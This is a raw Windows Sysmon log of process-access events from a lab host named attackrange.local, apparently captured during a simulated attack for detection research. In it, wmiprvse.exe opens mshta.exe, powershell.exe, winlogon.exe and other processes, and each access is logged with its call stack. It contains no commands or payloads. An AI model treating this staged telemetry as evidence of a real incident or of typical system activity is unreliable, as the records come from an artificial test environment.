15:59:15.554{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2306-00000000A301}3356C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022987Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2206-00000000A301}6044C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022986Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022985Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022984Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022983Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022982Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022981Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022980Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022979Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022978Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022977Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022976Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022975Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022974Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022973Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022972Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022971Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022970Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022969Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022968Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 